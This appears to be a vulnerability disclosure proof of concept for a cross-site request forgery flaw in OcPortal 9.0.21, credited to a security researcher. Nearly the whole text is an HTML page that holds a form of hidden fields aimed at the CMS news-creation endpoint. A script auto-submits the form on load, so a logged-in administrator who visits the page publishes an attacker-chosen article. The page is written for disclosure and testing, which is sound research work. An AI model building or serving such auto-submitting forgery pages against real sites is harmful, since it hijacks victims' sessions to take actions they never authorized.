Proof of Concept Code
***************************
<!DOCTYPE>
<html lang="en">
<head>
<title>OcPortal 9.0.21 CSRF Vulnerability POC</title>
</head>
<body>
<form action="
http://localhost/ocportal/cms/index.php?page=cms_news&type=_ad&uploading=1";
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="MAX_FILE_SIZE" value="16777216" />
<input type="hidden" name="file1" value="" />
<input type="hidden" name="tick_on_form__validated" value="0" />
<input type="hidden" name="label_for__allow_rating" value="Allow rating" />
<input type="hidden" name="f_face" value="/" />
<input type="hidden" name="require__author" value="1" />
<input type="hidden" name="label_for__title" value="Title" />
<input type="hidden" name="file" value="" />
<input type="hidden" name="label_for__meta_description" value="Concise description" />
<input type="hidden" name="require__meta_description" value="0" />
<input type="hidden" name="validated" value="1" />
<input type="hidden" name="label_for__meta_keywords[]1" value="Keywords" />
<input type="hidden" name="label_for__meta_keywords[]0" value="Keywords" />
<input type="hidden" name="meta_description" value="Attack_OcPortal" />
<input type="hidden" name="allow_comments" value="1" />
<input type="hidden" name="comcode__news" value="1" />
<input type="hidden" name="http_referer" value="http://localhost/ocportal/cms/index.php?page=cms_news&type=ad"; />
<input type="hidden" name="author" value="Attack_OcPortal" />
<input type="hidden" name="pre_f_notes" value="1" />
<input type="hidden" name="post__is_wysiwyg" value="1" />
<input type="hidden" name="label_for__file" value="Image" />
<input type="hidden" name="comcode__title" value="1" />
<input type="hidden" name="require__news_category" value="0" />
<input type="hidden" name="allow_rating" value="1" />
<input type="hidden" name="tick_on_form__allow_rating" value="0" />
<input type="hidden" name="require__allow_comments" value="0" />
<input type="hidden" name="label_for__validated" value="Validated" />
<input type="hidden" name="label_for__notes" value="Notes" />
<input type="hidden" name="label_for__post" value="News article" />
<input type="hidden" name="meta_keywords[]" value="Attack_OcPortal" />
<input type="hidden" name="label_for__main_news_category" value="Main category" />
<input type="hidden" name="f_size" value="" />
<input type="hidden" name="require__allow_rating" value="0" />
<input type="hidden" name="label_for__author" value="Source" />
<input type="hidden" name="require__title" value="1" />
<input type="hidden" name="comcode__post" value="1" />
<input type="hidden" name="news" value="Attack_OcPortal" />
<input type="hidden" name="post" value="Attack_OcPortal" />
<input type="hidden" name="require__validated" value="0" />
<input type="hidden" name="news__is_wysiwyg" value="1" />
<input type="hidden" name="require__notes" value="0" />
<input type="hidden" name="label_for__allow_comments" value="Allow comments" />
<input type="hidden" name="posting_ref_id" value="13973" />
<input type="hidden" name="f_colour" value="" />
<input type="hidden" name="label_for__news" value="News summary" />
<input type="hidden" name="require__meta_keywords" value="0" />
<input type="hidden" name="notes" value="Attack_OcPortal" />
<input type="hidden" name="title" value="Attack_OcPortal" />
<input type="hidden" name="require__file" value="0" />
<input type="hidden" name="require__main_news_category" value="1" />
<input type="hidden" name="label_for__news_category" value="Secondary categories" />
<input type="hidden" name="main_news_category" value="7" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
Credits & Authors
**********************
Arjun Basnet from Cyber Security Works Pvt. Ltd. (http://cybersecurityworks.com)
